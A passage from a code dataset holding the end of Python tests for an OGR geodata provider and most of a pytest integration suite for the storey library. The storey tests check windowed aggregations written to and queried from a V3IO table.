assert properties['straatnaam'] == 'Planken Wambuisweg'
def test_query_with_limit_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_28992)
feature_collection = p.query(limit=2, resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 2
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
def test_query_with_limit_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
feature_collection = p.query(limit=5, resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
def test_query_with_startindex_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_28992)
feature_collection = p.query(startindex=20, limit=5, resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
assert feature['id'] == 'inspireadressen.1744969'
assert 'Egypte' in properties['straatnaam']
geometry = feature.get('geometry', None)
assert geometry is not None
def test_query_with_startindex_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
feature_collection = p.query(startindex=20, limit=5, resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
assert feature['id'] == 'inspireadressen.1744969'
assert 'Egypte' in properties['straatnaam']
geometry = feature.get('geometry', None)
assert geometry is not None
def test_query_bbox_with_startindex_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_28992)
feature_collection = p.query(
startindex=10, limit=5,
bbox=(5.742, 52.053, 5.773, 52.098),
resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
assert properties['straatnaam'] == 'Buurtweg'
assert properties['huisnummer'] == '4'
def test_query_bbox_with_startindex_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
feature_collection = p.query(
startindex=1, limit=5,
bbox=(5.742, 52.053, 5.773, 52.098),
resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
assert properties['straatnaam'] == 'Egypte'
assert properties['huisnummer'] == '6'
| 34.636905
| 78
| 0.677006
| 1,387
| 11,638
| 5.527758
| 0.101658
| 0.121951
| 0.099126
| 0.050998
| 0.898004
| 0.875179
| 0.872571
| 0.865528
| 0.860571
| 0.859397
| 0
| 0.065795
| 0.204674
| 11,638
| 335
| 79
| 34.740299
| 0.762532
| 0.117202
| 0
| 0.773279
| 0
| 0
| 0.163933
| 0.024064
| 0
| 0
| 0
| 0
| 0.315789
| 1
| 0.080972
| false
| 0
| 0.012146
| 0.012146
| 0.105263
| 0.008097
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07b9f7f652be27c1ad35a0de1f9bfe2451832332
| 86,060
|
py
|
Python
|
integration/test_aggregation_integration.py
|
dinal/storey
|
811363cdeaa4d3008d929f9889e6cbb590e7a754
|
[
"Apache-2.0"
] | null | null | null |
integration/test_aggregation_integration.py
|
dinal/storey
|
811363cdeaa4d3008d929f9889e6cbb590e7a754
|
[
"Apache-2.0"
] | null | null | null |
integration/test_aggregation_integration.py
|
dinal/storey
|
811363cdeaa4d3008d929f9889e6cbb590e7a754
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
from datetime import timedelta
import pytest
import math
import pandas as pd
from storey import build_flow, SyncEmitSource, Reduce, Table, V3ioDriver, MapWithState, AggregateByKey, FieldAggregator, \
QueryByKey, NoSqlTarget, Context, DataframeSource, Map
from storey.dtypes import SlidingWindows, FixedWindows, EmitAfterMaxEvent
from storey.utils import _split_path
from .integration_test_utils import setup_teardown_test, append_return, test_base_time
@pytest.mark.parametrize('partitioned_by_key', [True, False])
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_aggregate_and_query_with_different_sliding_windows(setup_teardown_test, partitioned_by_key, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key, flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max', 'sqr'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_sqr_1h': 0, 'number_of_stuff_sqr_2h': 0, 'number_of_stuff_sqr_24h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0, 'col1': 0},
{'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_sqr_1h': 1, 'number_of_stuff_sqr_2h': 1, 'number_of_stuff_sqr_24h': 1,
'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5, 'col1': 1},
{'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_sqr_1h': 5, 'number_of_stuff_sqr_2h': 5, 'number_of_stuff_sqr_24h': 5,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0, 'col1': 2},
{'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_sqr_1h': 14, 'number_of_stuff_sqr_2h': 14, 'number_of_stuff_sqr_24h': 14,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5, 'col1': 3},
{'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_sqr_1h': 29, 'number_of_stuff_sqr_2h': 30, 'number_of_stuff_sqr_24h': 30,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0, 'col1': 4},
{'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
'number_of_stuff_max_24h': 5, 'number_of_stuff_sqr_1h': 50, 'number_of_stuff_sqr_2h': 55, 'number_of_stuff_sqr_24h': 55,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5, 'col1': 5},
{'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
'number_of_stuff_max_24h': 6, 'number_of_stuff_sqr_1h': 77, 'number_of_stuff_sqr_2h': 90, 'number_of_stuff_sqr_24h': 91,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0, 'col1': 6},
{'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
'number_of_stuff_max_24h': 7, 'number_of_stuff_sqr_1h': 110, 'number_of_stuff_sqr_2h': 135, 'number_of_stuff_sqr_24h': 140,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5, 'col1': 7},
{'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
'number_of_stuff_max_24h': 8, 'number_of_stuff_sqr_1h': 149, 'number_of_stuff_sqr_2h': 190, 'number_of_stuff_sqr_24h': 204,
'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0, 'col1': 8},
{'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
'number_of_stuff_max_24h': 9, 'number_of_stuff_sqr_1h': 194, 'number_of_stuff_sqr_2h': 255, 'number_of_stuff_sqr_24h': 285,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
tables = [table, Table(setup_teardown_test, V3ioDriver())] # test on previous table and on new table
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 17.0, 'number_of_stuff_min_1h': 8.0,
'number_of_stuff_max_1h': 9.0, 'number_of_stuff_avg_1h': 8.5},
{'col1': 10, 'number_of_stuff_sum_1h': 9.0, 'number_of_stuff_min_1h': 9.0,
'number_of_stuff_max_1h': 9.0, 'number_of_stuff_avg_1h': 9.0},
]
for table in tables:
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h', 'number_of_stuff_avg_1h', 'number_of_stuff_min_1h', 'number_of_stuff_max_1h'],
table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.emit(data, 'tal', base_time + timedelta(minutes=25))
controller.terminate()
actual = controller.await_termination()
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('partitioned_by_key', [True, False])
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_aggregate_and_query_with_different_fixed_windows(setup_teardown_test, partitioned_by_key, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key, flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1',
['sum', 'avg', 'min', 'max', 'sqr'],
FixedWindows(['1h', '2h', '24h']))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_max_1h': 0.0, 'number_of_stuff_max_2h': 0.0, 'number_of_stuff_max_24h': 0.0,
'number_of_stuff_sqr_1h': 0.0, 'number_of_stuff_sqr_2h': 0.0, 'number_of_stuff_sqr_24h': 0.0,
'number_of_stuff_sum_1h': 0.0, 'number_of_stuff_sum_2h': 0.0, 'number_of_stuff_sum_24h': 0.0,
'number_of_stuff_min_1h': 0.0, 'number_of_stuff_min_2h': 0.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0, 'col1': 0},
{'number_of_stuff_max_1h': 1.0, 'number_of_stuff_sqr_1h': 1.0, 'number_of_stuff_sum_1h': 1.0,
'number_of_stuff_min_1h': 1.0, 'number_of_stuff_max_2h': 1.0, 'number_of_stuff_sqr_2h': 1.0,
'number_of_stuff_sum_2h': 1.0, 'number_of_stuff_min_2h': 0.0, 'number_of_stuff_max_24h': 1.0,
'number_of_stuff_sqr_24h': 1.0, 'number_of_stuff_sum_24h': 1.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5, 'col1': 1},
{'number_of_stuff_max_1h': 2.0, 'number_of_stuff_max_2h': 2.0, 'number_of_stuff_max_24h': 2.0,
'number_of_stuff_sqr_1h': 5.0, 'number_of_stuff_sqr_2h': 5.0, 'number_of_stuff_sqr_24h': 5.0,
'number_of_stuff_sum_1h': 3.0, 'number_of_stuff_sum_2h': 3.0, 'number_of_stuff_sum_24h': 3.0,
'number_of_stuff_min_1h': 1.0, 'number_of_stuff_min_2h': 0.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 1.5, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0, 'col1': 2},
{'number_of_stuff_max_1h': 3.0, 'number_of_stuff_max_2h': 3.0, 'number_of_stuff_max_24h': 3.0,
'number_of_stuff_sqr_1h': 14.0, 'number_of_stuff_sqr_2h': 14.0, 'number_of_stuff_sqr_24h': 14.0,
'number_of_stuff_sum_1h': 6.0, 'number_of_stuff_sum_2h': 6.0, 'number_of_stuff_sum_24h': 6.0,
'number_of_stuff_min_1h': 1.0, 'number_of_stuff_min_2h': 0.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5, 'col1': 3},
{'number_of_stuff_max_1h': 4.0, 'number_of_stuff_sqr_1h': 16.0, 'number_of_stuff_sum_1h': 4.0,
'number_of_stuff_min_1h': 4.0, 'number_of_stuff_max_2h': 4.0, 'number_of_stuff_sqr_2h': 30.0,
'number_of_stuff_sum_2h': 10.0, 'number_of_stuff_min_2h': 1.0, 'number_of_stuff_max_24h': 4.0,
'number_of_stuff_sqr_24h': 30.0, 'number_of_stuff_sum_24h': 10.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 2.5, 'number_of_stuff_avg_24h': 2.0, 'col1': 4},
{'number_of_stuff_max_1h': 5.0, 'number_of_stuff_max_2h': 5.0, 'number_of_stuff_max_24h': 5.0,
'number_of_stuff_sqr_1h': 41.0, 'number_of_stuff_sqr_2h': 55.0, 'number_of_stuff_sqr_24h': 55.0,
'number_of_stuff_sum_1h': 9.0, 'number_of_stuff_sum_2h': 15.0, 'number_of_stuff_sum_24h': 15.0,
'number_of_stuff_min_1h': 4.0, 'number_of_stuff_min_2h': 1.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 4.5, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5, 'col1': 5},
{'number_of_stuff_max_1h': 6.0, 'number_of_stuff_sqr_1h': 36.0, 'number_of_stuff_sum_1h': 6.0,
'number_of_stuff_min_1h': 6.0, 'number_of_stuff_max_2h': 6.0, 'number_of_stuff_sqr_2h': 36.0,
'number_of_stuff_sum_2h': 6.0, 'number_of_stuff_min_2h': 6.0, 'number_of_stuff_max_24h': 6.0,
'number_of_stuff_sqr_24h': 36.0, 'number_of_stuff_sum_24h': 6.0, 'number_of_stuff_min_24h': 6.0,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 6.0, 'col1': 6},
{'number_of_stuff_max_1h': 7.0, 'number_of_stuff_max_2h': 7.0, 'number_of_stuff_max_24h': 7.0,
'number_of_stuff_sqr_1h': 85.0, 'number_of_stuff_sqr_2h': 85.0, 'number_of_stuff_sqr_24h': 85.0,
'number_of_stuff_sum_1h': 13.0, 'number_of_stuff_sum_2h': 13.0, 'number_of_stuff_sum_24h': 13.0,
'number_of_stuff_min_1h': 6.0, 'number_of_stuff_min_2h': 6.0, 'number_of_stuff_min_24h': 6.0,
'number_of_stuff_avg_1h': 6.5, 'number_of_stuff_avg_2h': 6.5, 'number_of_stuff_avg_24h': 6.5, 'col1': 7},
{'number_of_stuff_max_1h': 8.0, 'number_of_stuff_sqr_1h': 64.0, 'number_of_stuff_sum_1h': 8.0,
'number_of_stuff_min_1h': 8.0, 'number_of_stuff_max_2h': 8.0, 'number_of_stuff_sqr_2h': 149.0,
'number_of_stuff_sum_2h': 21.0, 'number_of_stuff_min_2h': 6.0, 'number_of_stuff_max_24h': 8.0,
'number_of_stuff_sqr_24h': 149.0, 'number_of_stuff_sum_24h': 21.0, 'number_of_stuff_min_24h': 6.0,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 7.0, 'col1': 8},
{'number_of_stuff_max_1h': 9.0, 'number_of_stuff_max_2h': 9.0, 'number_of_stuff_max_24h': 9.0,
'number_of_stuff_sqr_1h': 145.0, 'number_of_stuff_sqr_2h': 230.0, 'number_of_stuff_sqr_24h': 230.0,
'number_of_stuff_sum_1h': 17.0, 'number_of_stuff_sum_2h': 30.0, 'number_of_stuff_sum_24h': 30.0,
'number_of_stuff_min_1h': 8.0, 'number_of_stuff_min_2h': 6.0, 'number_of_stuff_min_24h': 6.0,
'number_of_stuff_avg_1h': 8.5, 'number_of_stuff_avg_2h': 7.5, 'number_of_stuff_avg_24h': 7.5, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
tables = [table, Table(setup_teardown_test, V3ioDriver())] # test on previous table and on new table
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 17.0, 'number_of_stuff_min_1h': 8.0,
'number_of_stuff_max_1h': 9.0, 'number_of_stuff_avg_1h': 8.5},
{'col1': 10, 'number_of_stuff_sum_1h': 0.0, 'number_of_stuff_min_1h': math.inf,
'number_of_stuff_max_1h': -math.inf, 'number_of_stuff_avg_1h': math.nan},
]
for table in tables:
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h', 'number_of_stuff_avg_1h', 'number_of_stuff_min_1h', 'number_of_stuff_max_1h'],
table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.emit(data, 'tal', base_time + timedelta(minutes=25))
controller.terminate()
actual = controller.await_termination()
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_query_virtual_aggregations_flow(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['avg', 'stddev', 'stdvar'],
SlidingWindows(['24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'dina', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_avg_24h': 0.0, 'number_of_stuff_stddev_24h': math.nan, 'number_of_stuff_stdvar_24h': math.nan},
{'col1': 1, 'number_of_stuff_avg_24h': 0.5, 'number_of_stuff_stddev_24h': math.sqrt(0.5), 'number_of_stuff_stdvar_24h': 0.5},
{'col1': 2, 'number_of_stuff_avg_24h': 1.0, 'number_of_stuff_stddev_24h': 1.0, 'number_of_stuff_stdvar_24h': 1.0},
{'col1': 3, 'number_of_stuff_avg_24h': 1.5, 'number_of_stuff_stddev_24h': math.sqrt(1.6666666666666667),
'number_of_stuff_stdvar_24h': 1.6666666666666667},
{'col1': 4, 'number_of_stuff_avg_24h': 2.0, 'number_of_stuff_stddev_24h': math.sqrt(2.5), 'number_of_stuff_stdvar_24h': 2.5},
{'col1': 5, 'number_of_stuff_avg_24h': 2.5, 'number_of_stuff_stddev_24h': math.sqrt(3.5), 'number_of_stuff_stdvar_24h': 3.5},
{'col1': 6, 'number_of_stuff_avg_24h': 3.0, 'number_of_stuff_stddev_24h': math.sqrt(4.666666666666667),
'number_of_stuff_stdvar_24h': 4.666666666666667},
{'col1': 7, 'number_of_stuff_avg_24h': 3.5, 'number_of_stuff_stddev_24h': math.sqrt(6.0), 'number_of_stuff_stdvar_24h': 6.0},
{'col1': 8, 'number_of_stuff_avg_24h': 4.0, 'number_of_stuff_stddev_24h': math.sqrt(7.5), 'number_of_stuff_stdvar_24h': 7.5},
{'col1': 9, 'number_of_stuff_avg_24h': 4.5, 'number_of_stuff_stddev_24h': math.sqrt(9.166666666666666),
'number_of_stuff_stdvar_24h': 9.166666666666666}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_avg_1h', 'number_of_stuff_stdvar_2h', 'number_of_stuff_stddev_3h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'dina', base_time)
controller.emit(data, 'dina', base_time + timedelta(minutes=25))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'number_of_stuff_avg_1h': 8.5, 'number_of_stuff_stdvar_2h': 1.6666666666666667,
'number_of_stuff_stddev_3h': 1.8708286933869707},
{'col1': 10, 'number_of_stuff_avg_1h': 9.0, 'number_of_stuff_stdvar_2h': 1.0, 'number_of_stuff_stddev_3h': 1.8708286933869707},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('partitioned_by_key', [True, False])
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_query_aggregate_by_key(setup_teardown_test, partitioned_by_key, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key, flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max', 'sqr'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_sqr_1h': 0, 'number_of_stuff_sqr_2h': 0, 'number_of_stuff_sqr_24h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0, 'col1': 0},
{'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_sqr_1h': 1, 'number_of_stuff_sqr_2h': 1, 'number_of_stuff_sqr_24h': 1,
'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5, 'col1': 1},
{'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_sqr_1h': 5, 'number_of_stuff_sqr_2h': 5, 'number_of_stuff_sqr_24h': 5,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0, 'col1': 2},
{'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_sqr_1h': 14, 'number_of_stuff_sqr_2h': 14, 'number_of_stuff_sqr_24h': 14,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5, 'col1': 3},
{'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_sqr_1h': 29, 'number_of_stuff_sqr_2h': 30, 'number_of_stuff_sqr_24h': 30,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0, 'col1': 4},
{'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
'number_of_stuff_max_24h': 5, 'number_of_stuff_sqr_1h': 50, 'number_of_stuff_sqr_2h': 55, 'number_of_stuff_sqr_24h': 55,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5, 'col1': 5},
{'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
'number_of_stuff_max_24h': 6, 'number_of_stuff_sqr_1h': 77, 'number_of_stuff_sqr_2h': 90, 'number_of_stuff_sqr_24h': 91,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0, 'col1': 6},
{'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
'number_of_stuff_max_24h': 7, 'number_of_stuff_sqr_1h': 110, 'number_of_stuff_sqr_2h': 135, 'number_of_stuff_sqr_24h': 140,
